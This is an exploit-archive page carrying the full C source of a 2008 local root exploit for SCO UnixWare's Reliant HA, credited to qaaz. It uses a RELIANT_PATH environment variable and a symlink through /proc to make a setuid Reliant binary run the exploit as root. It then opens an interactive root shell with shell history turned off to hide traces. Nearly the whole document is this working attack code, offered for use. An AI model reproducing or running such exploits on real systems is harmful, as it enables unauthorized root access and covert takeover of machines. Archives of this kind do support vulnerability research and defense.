[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SCO UnixWare Reliant HA Local Root Exploit
# Published : 2008-04-04
# Author : qaaz
# Previous Title : SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit
# Next Title : Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit
/* 04/2008: public release
* I have'nt seen any advisory on this; possibly still not fixed.
*
* SCO UnixWare Reliant HA Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#define TGT1 "/usr/opt/reliant/bin/hvdisp"
#define TGT2 "/usr/opt/reliant/bin/rcvm"
#define DIR "bin"
#define BIN DIR "/hvenv"
int main(int argc, char *argv[])
{
char self[4096], *target;
pid_t child;
if (geteuid() == 0) {
setuid(geteuid());
dup2(3, 0);
dup2(4, 1);
dup2(5, 2);
if ((child = fork()) == 0) {
putenv("HISTFILE=/dev/null");
execl("/bin/sh", "sh", "-i", NULL);
printf("[-] sh: %sn", strerror(errno));
} else if (child != -1)
waitpid(child, NULL, 0);
kill(getppid(), 15);
return 1;
}
printf("----------------------------------------n");
printf(" UnixWare Reliant HA Local Root Exploitn");
printf(" By qaazn");
printf("----------------------------------------n");
if (access(TGT1, EX_OK) == 0)
target = TGT1;
else if (access(TGT2, EX_OK) == 0)
target = TGT2;
else {
printf("[-] No targets foundn");
return 1;
}
sprintf(self, "/proc/%d/object/a.out", getpid());
if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
printf("[-] %s: %sn", DIR, strerror(errno));
return 1;
}
if (symlink(self, BIN) < 0) {
printf("[-] %s: %sn", BIN, strerror(errno));
rmdir(DIR);
return 1;
}
if ((child = fork()) == 0) {
char path[4096] = "RELIANT_PATH=";
dup2(0, 3);
dup2(1, 4);
dup2(2, 5);
putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));
execl(target, target, NULL);
printf("[-] %s: %sn", target, strerror(errno));
return 1;
} else if (child != -1)
waitpid(child, NULL, 0);
unlink(BIN);
rmdir(DIR);
return 0;
}
// www.Syue.com [2008-04-04]